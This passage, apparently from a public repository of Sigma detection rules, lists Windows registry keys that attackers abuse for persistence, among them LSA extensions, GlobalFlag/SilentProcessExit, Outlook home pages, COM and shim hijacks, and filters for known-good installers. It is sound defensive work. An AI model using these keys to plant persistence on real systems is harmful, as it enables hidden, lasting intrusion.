    "content": "title: Potential Persistence Via Custom Protocol Handler\nid: fdbf0b9d-0182-4c43-893b-a1eaab92d085\nstatus: test\ndescription: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.\nreferences:\n    - https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-05-30\nmodified: 2023-05-12\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|startswith: 'HKCR\\'\n        Details|startswith: 'URL:'\n    filter_main_ms_trusted:\n        Details|startswith: 'URL:ms-' # Microsoft Protocols usually start with \"ms-\"\n    filter_main_generic_locations:\n        Image|startswith: # Add more folders to avoid FP\n            - 'C:\\Program Files (x86)'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    # Uncomment This section to add specific Protocol Handler names that are know\n    # filter_specific:\n    #     Details: 'URL:'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Many legitimate applications can register a new custom protocol handler. Additional filters needs to applied according to your environment.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml",
    "content": "title: Potential Persistence Via Event Viewer Events.asp\nid: a1e11042-a74a-46e6-b07c-c4ce8ecc239b\nstatus: test\ndescription: Detects potential registry persistence technique using the Event Viewer \"Events.asp\" technique\nreferences:\n    - https://twitter.com/nas_bench/status/1626648985824788480\n    - https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks\n    - https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1112/T1112.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-17\nmodified: 2023-03-05\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        # Covers both \"\\Policies\\\" and \"\\Software\\\" paths for both \"Machine\" and \"User\" level configs\n        # Also \"MicrosoftRedirectionProgramCommandLineParameters\" key\n        TargetObject|contains:\n            - '\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram'\n            - '\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionURL'\n    filter_default_redirect_program:\n        Image|endswith: 'C:\\WINDOWS\\system32\\svchost.exe' # Set via GPO\n        TargetObject|endswith: '\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram'\n        Details: '%%SystemRoot%%\\PCHealth\\HelpCtr\\Binaries\\HelpCtr.exe'\n    filter_default_redirect_program_cli:\n        Image|endswith: 'C:\\WINDOWS\\system32\\svchost.exe' # Set via GPO\n        TargetObject|endswith: '\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgramCommandLineParameters'\n        Details: '-url hcp://services/centers/support?topic=%%s'\n    filter_url:\n        Details: 'http://go.microsoft.com/fwlink/events.asp'\n    filter_cleaner:\n        Details: '(Empty)'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_globalflags.yml",
    "content": "title: Potential Persistence Via GlobalFlags\nid: 36803969-5421-41ec-b92f-8500f79c23b0\nrelated:\n    - id: c81fe886-cac0-4913-a511-2822d72ff505\n      type: obsolete\nstatus: test\ndescription: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys\nreferences:\n    - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/\n    - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/\nauthor: Karneades, Jonhnathan Ribeiro, Florian Roth\ndate: 2018-04-11\nmodified: 2023-06-05\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1546.012\n    - car.2013-01-002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_global_flag:\n        TargetObject|contains|all:\n            - '\\Microsoft\\Windows NT\\CurrentVersion\\'\n            - '\\Image File Execution Options\\'\n            - '\\GlobalFlag'\n    selection_silent_process:\n        TargetObject|contains|all:\n            - '\\Microsoft\\Windows NT\\CurrentVersion\\'\n            - '\\SilentProcessExit\\'\n        TargetObject|contains:\n            - '\\ReportingMode'\n            - '\\MonitorProcess'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_ie.yml",
    "content": "title: Modification of IE Registry Settings\nid: d88d0ab2-e696-4d40-a2ed-9790064e66b3\nstatus: test\ndescription: Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert JavaScript for persistence\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry\nauthor: frack113\ndate: 2022-01-22\nmodified: 2025-10-22\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_domains:\n        TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings'\n    filter_main_dword:\n        Details|startswith: 'DWORD'\n    filter_main_null:\n        Details: null\n    filter_main_office:\n        Details:\n            - 'Cookie:'\n            - 'Visited:'\n            - '(Empty)'\n    filter_main_path:\n        TargetObject|contains:\n            - '\\Cache'\n            - '\\ZoneMap'\n            - '\\WpadDecision'\n    filter_main_binary:\n        Details: 'Binary Data'\n    filter_optional_accepted_documents:\n        # Spotted during Office installations\n        TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Accepted Documents'\n    condition: selection_domains and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml",
    "content": "title: Register New IFiltre For Persistence\nid: b23818c7-e575-4d13-8012-332075ec0a2b\nstatus: test\ndescription: |\n    Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index.\n    You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.\nreferences:\n    - https://persistence-info.github.io/Data/ifilters.html\n    - https://twitter.com/0gtweet/status/1468548924600459267\n    - https://github.com/gtworek/PSBits/tree/master/IFilter\n    - https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2024-03-26\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_ext:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Classes\\.'\n            - '\\PersistentHandler'\n    selection_clsid:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Classes\\CLSID'\n            - '\\PersistentAddinsRegistered\\{89BCB740-6119-101A-BCB7-00DD010655AF}'\n    filter_default_targets:\n        TargetObject|contains:\n            # TODO: Add the default extension PersistentHandler.\n            # Note this could also offer blindspot as the attacker could use on of these and hijack them\n            - '\\CLSID\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\\' # Office Open XML Format PowerPoint Persistent Handler\n            - '\\CLSID\\{4887767F-7ADC-4983-B576-88FB643D6F79}\\' # Office Open XML Format Excel Persistent Handler\n            - '\\CLSID\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\\' # Office Open XML Format Word Persistent Handler\n            - '\\CLSID\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\\' # Microsoft OneNote Windows Desktop Search IFilter Persistent handler\n            - '\\CLSID\\{098f2470-bae0-11cd-b579-08002b30bfeb}\\' # Null persistent handler\n            - '\\CLSID\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\\' # PDF Persistent Handler\n            - '\\CLSID\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\\' # rtf persistent handler\n            - '\\CLSID\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\\' # Open Document Format ODT Persistent Handler\n            - '\\CLSID\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\\' # Zip Persistent Handler\n            - '\\CLSID\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\\' # Open Document Format ODS Persistent Handler\n            - '\\CLSID\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\\' # Related to MIME Filter\n            - '\\CLSID\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\\' # Related to MIME Filter\n            - '\\CLSID\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\\' # Setting Content File Persistent Handler\n            - '\\CLSID\\{5e941d80-bf96-11cd-b579-08002b30bfeb}\\' # Plain Text persistent handler\n            - '\\CLSID\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\\' # Wordpad OOXML Document Filter\n            - '\\CLSID\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\\' # XML File Persistent Handler\n            - '\\CLSID\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\\' # .url File Persistent Handler\n            - '\\CLSID\\{9694E38A-E081-46ac-99A0-8743C909ACB6}\\' # html persistent handler for mapi email\n            - '\\CLSID\\{98de59a0-d175-11cd-a7bd-00006b827d94}\\' # Microsoft Office Persistent Handler\n            - '\\CLSID\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\\' # Wordpad ODT Document Filter\n            - '\\CLSID\\{B4132098-7A03-423D-9463-163CB07C151F}\\' # Office Open XML Format Excel Persistent Handler\n            - '\\CLSID\\{d044309b-5da6-4633-b085-4ed02522e5a5}\\' # App Content File Persistent Handler\n            - '\\CLSID\\{D169C14A-5148-4322-92C8-754FC9D018D8}\\' # rtf persistent handler for mapi email\n            - '\\CLSID\\{DD75716E-B42E-4978-BB60-1497B92E30C4}\\' # text persistent handler for mapi email\n            - '\\CLSID\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\\' # Open Document Format ODP Persistent Handler\n            - '\\CLSID\\{E772CEB3-E203-4828-ADF1-765713D981B8}\\' # Microsoft OneNote Section persistent handler\n            - '\\CLSID\\{eec97550-47a9-11cf-b952-00aa0051fe20}' # HTML File persistent handler\n            # - '\\CLSID\\{F6F00E65-9CAF-43BB-809A-38AA4621BCF2}' # XMind Persistent Handler (not present by default)\n            - '\\CLSID\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\\' # Office Outlook MSG Persistent Handler\n    filter_generic_paths:\n        Image|startswith:\n            # Note: We assume if an attacker has access to one of these directories. Then he already has admin.\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n    condition: 1 of selection_* and not 1 of filter_*\nfalsepositives:\n    - Legitimate registration of IFilters by the OS or software\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript.yml",
    "content": "title: Potential Persistence Via Logon Scripts - Registry\nid: 9ace0707-b560-49b8-b6ca-5148b42f39fb\nstatus: test\ndescription: Detects creation of \"UserInitMprLogonScript\" registry value which can be used as a persistence method by malicious actors\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md\nauthor: Tom Ueltschi (@c_APT_ure)\ndate: 2019-01-12\nmodified: 2025-10-26\ntags:\n    - attack.privilege-escalation\n    - attack.t1037.001\n    - attack.persistence\n    - attack.lateral-movement\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'UserInitMprLogonScript'\n    condition: selection\nfalsepositives:\n    - Investigate the contents of the \"UserInitMprLogonScript\" value to determine of the added script is legitimate\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Logon Scripts\n      technique: T1037.001\n      atomic_guid: d6042746-07d4-4c92-9ad8-e644c114a231\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_lsa_extension.yml",
    "content": "title: Potential Persistence Via LSA Extensions\nid: 41f6531d-af6e-4c6e-918f-b946f2b85a36\nstatus: test\ndescription: |\n    Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\n    The \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\nreferences:\n    - https://persistence-info.github.io/Data/lsaaextension.html\n    - https://twitter.com/0gtweet/status/1476286368385019906\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SYSTEM\\CurrentControlSet\\Control\\LsaExtensionConfig\\LsaSrv\\Extensions'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml",
    "content": "title: Potential Persistence Via Mpnotify\nid: 92772523-d9c1-4c93-9547-b0ca500baba3\nstatus: test\ndescription: Detects when an attacker register a new SIP provider for persistence and defense evasion\nreferences:\n    - https://persistence-info.github.io/Data/mpnotify.html\n    - https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\mpnotify'\n    condition: selection\nfalsepositives:\n    - Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml",
    "content": "title: Potential Persistence Via MyComputer Registry Keys\nid: 8fbe98a8-8f9d-44f8-aa71-8c572e29ef06\nstatus: test\ndescription: Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)\nreferences:\n    - https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-09\nmodified: 2024-01-11\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer'\n        TargetObject|endswith: '(Default)'\n    condition: selection\nfalsepositives:\n    - Unlikely but if you experience FPs add specific processes and locations you would like to monitor for\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml",
    "content": "title: Potential Persistence Via DLLPathOverride\nid: a1b1fd53-9c4a-444c-bae0-34a330fc7aa8\nstatus: test\ndescription: Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process\nreferences:\n    - https://persistence-info.github.io/Data/naturallanguage6.html\n    - https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_root:\n        # The path can be for multiple languages\n        # Example:  HKLM\\System\\CurrentControlSet\\Control\\ContentIndex\\Language\\English_UK\n        #           HKLM\\System\\CurrentControlSet\\Control\\ContentIndex\\Language\\English_US\n        #           HKLM\\System\\CurrentControlSet\\Control\\ContentIndex\\Language\\Neutral\n        TargetObject|contains: '\\SYSTEM\\CurrentControlSet\\Control\\ContentIndex\\Language\\'\n    selection_values:\n        TargetObject|contains:\n            - '\\StemmerDLLPathOverride'\n            - '\\WBDLLPathOverride'\n            - '\\StemmerClass'\n            - '\\WBreakerClass'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_office_vsto.yml",
    "content": "title: Potential Persistence Via Visual Studio Tools for Office\nid: 9d15044a-7cfe-4d23-8085-6ebc11df7685\nstatus: test\ndescription: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.\nreferences:\n    - https://twitter.com/_vivami/status/1347925307643355138\n    - https://vanmieghem.io/stealth-outlook-persistence/\nauthor: Bhabesh Raj\ndate: 2021-01-10\nmodified: 2025-10-07\ntags:\n    - attack.t1137.006\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Software\\Microsoft\\Office\\Outlook\\Addins\\'\n            - '\\Software\\Microsoft\\Office\\Word\\Addins\\'\n            - '\\Software\\Microsoft\\Office\\Excel\\Addins\\'\n            - '\\Software\\Microsoft\\Office\\Powerpoint\\Addins\\'\n            - '\\Software\\Microsoft\\VSTO\\Security\\Inclusion\\'\n    filter_main_system:\n        Image:\n            - 'C:\\Windows\\System32\\msiexec.exe'\n            - 'C:\\Windows\\SysWOW64\\msiexec.exe'\n            - 'C:\\Windows\\System32\\regsvr32.exe'\n            - 'C:\\Windows\\SysWOW64\\regsvr32.exe' # e.g. default Evernote installation\n    filter_main_office_click_to_run:\n        Image|startswith:\n            - 'C:\\Program Files\\Common Files (x86)\\Microsoft Shared\\ClickToRun\\'\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    filter_main_integrator:\n        Image:\n            - 'C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe'\n            - 'C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe'\n    filter_main_office_apps:\n        Image|startswith:\n            - 'C:\\Program Files\\Microsoft Office\\OFFICE'\n            - 'C:\\Program Files (x86)\\Microsoft Office\\OFFICE'\n            - 'C:\\Program Files\\Microsoft Office\\Root\\OFFICE'\n            - 'C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE'\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\Integrator.exe'\n            - '\\outlook.exe'\n            - '\\powerpnt.exe'\n            - '\\Teams.exe'\n            - '\\visio.exe'\n            - '\\winword.exe'\n    filter_optional_avg:\n        Image:\n            - 'C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe'\n            - 'C:\\Program Files (x86)\\AVG\\Antivirus\\RegSvr.exe'\n        TargetObject|contains: '\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt\\'\n    filter_optional_avast:\n        Image:\n            - 'C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe'\n            - 'C:\\Program Files (x86)\\Avast Software\\Avast\\RegSvr.exe'\n        TargetObject|contains: '\\Microsoft\\Office\\Outlook\\Addins\\Avast.AsOutExt\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate Addin Installation\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_outlook_homepage.yml",
    "content": "title: Potential Persistence Via Outlook Home Page\nid: ddd171b5-2cc6-4975-9e78-f0eccd08cc76\nrelated:\n    - id: 487bb375-12ef-41f6-baae-c6a1572b4dd1\n      type: similar\nstatus: test\ndescription: |\n    Detects potential persistence activity via outlook home page.\n    An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70\n    - https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us\n    - https://trustedsec.com/blog/specula-turning-outlook-into-a-c2-with-one-registry-change\nauthor: Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand\ndate: 2021-06-09\nmodified: 2024-08-07\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\Software\\Microsoft\\Office\\'\n            - '\\Outlook\\WebView\\'\n        TargetObject|endswith: '\\URL'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_outlook_todaypage.yml",
    "content": "title: Potential Persistence Via Outlook Today Page\nid: 487bb375-12ef-41f6-baae-c6a1572b4dd1\nrelated:\n    - id: ddd171b5-2cc6-4975-9e78-f0eccd08cc76\n      type: similar\nstatus: test\ndescription: |\n    Detects potential persistence activity via outlook today page.\n    An attacker can set a custom page to execute arbitrary code and link to it via the registry values \"URL\" and \"UserDefinedUrl\".\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=74\n    - https://trustedsec.com/blog/specula-turning-outlook-into-a-c2-with-one-registry-change\nauthor: Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand\ndate: 2021-06-10\nmodified: 2024-08-07\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection_main:\n        TargetObject|contains|all:\n            - 'Software\\Microsoft\\Office\\'\n            - '\\Outlook\\Today\\'\n    selection_value_stamp:\n        TargetObject|endswith: '\\Stamp'\n        Details: 'DWORD (0x00000001)'\n    selection_value_url:\n        TargetObject|endswith:\n            - '\\URL'\n            - '\\UserDefinedUrl'\n    filter_main_office:\n        Image|startswith:\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\'\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    condition: selection_main and 1 of selection_value_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_reflectdebugger.yml",
    "content": "title: Potential WerFault ReflectDebugger Registry Value Abuse\nid: 0cf2e1c6-8d10-4273-8059-738778f981ad\nrelated:\n    - id: fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd\n      type: derived\nstatus: test\ndescription: Detects potential WerFault \"ReflectDebugger\" registry value abuse for persistence.\nreferences:\n    - https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html\n    - https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/\nauthor: X__Junior\ndate: 2023-05-18\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\ReflectDebugger'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_scrobj_dll.yml",
    "content": "title: Potential Persistence Via Scrobj.dll COM Hijacking\nid: fe20dda1-6f37-4379-bbe0-a98d400cae90\nstatus: test\ndescription: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md\nauthor: frack113\ndate: 2022-08-20\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.015\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: 'InprocServer32\\(Default)'\n        Details: 'C:\\WINDOWS\\system32\\scrobj.dll'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the dll.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_shim_database.yml",
    "content": "title: Potential Persistence Via Shim Database Modification\nid: dfb5b4e8-91d0-4291-b40a-e3b0d3942c45\nstatus: test\ndescription: |\n    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\n    The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb\n    - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html\n    - https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/\nauthor: frack113\ndate: 2021-12-30\nmodified: 2025-10-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.011\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\\'\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom\\'\n    filter_main_empty_string:\n        Details: ''\n    filter_main_empty_value:\n        Details: '(Empty)'\n    filter_main_null:\n        Details: null\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate custom SHIM installations will also trigger this rule\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml",
    "content": "title: Suspicious Shim Database Patching Activity\nid: bf344fea-d947-4ef4-9192-34d008315d3a\nstatus: test\ndescription: Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.\nreferences:\n    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/\n    - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-01\nmodified: 2023-12-06\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.011\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom\\'\n        TargetObject|endswith:\n            # Note: add other application to increase coverage\n            - '\\csrss.exe'\n            - '\\dllhost.exe'\n            - '\\explorer.exe'\n            - '\\RuntimeBroker.exe'\n            - '\\services.exe'\n            - '\\sihost.exe'\n            - '\\svchost.exe'\n            - '\\taskhostw.exe'\n            - '\\winlogon.exe'\n            - '\\WmiPrvSe.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml",
    "content": "title: Potential Persistence Via Shim Database In Uncommon Location\nid: 6b6976a3-b0e6-4723-ac24-ae38a737af41\nstatus: test\ndescription: Detects the installation of a new shim database where the file is located in a non-default location\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html\n    - https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/\n    - https://www.blackhat.com/docs/asia-14/materials/Erickson/Asia-14-Erickson-Persist-It-Using-And-Abusing-Microsofts-Fix-It-Patches.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-01\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.011\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\\'\n            - '\\DatabasePath'\n    filter_main_known_locations:\n        Details|contains: ':\\Windows\\AppPatch\\Custom'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml",
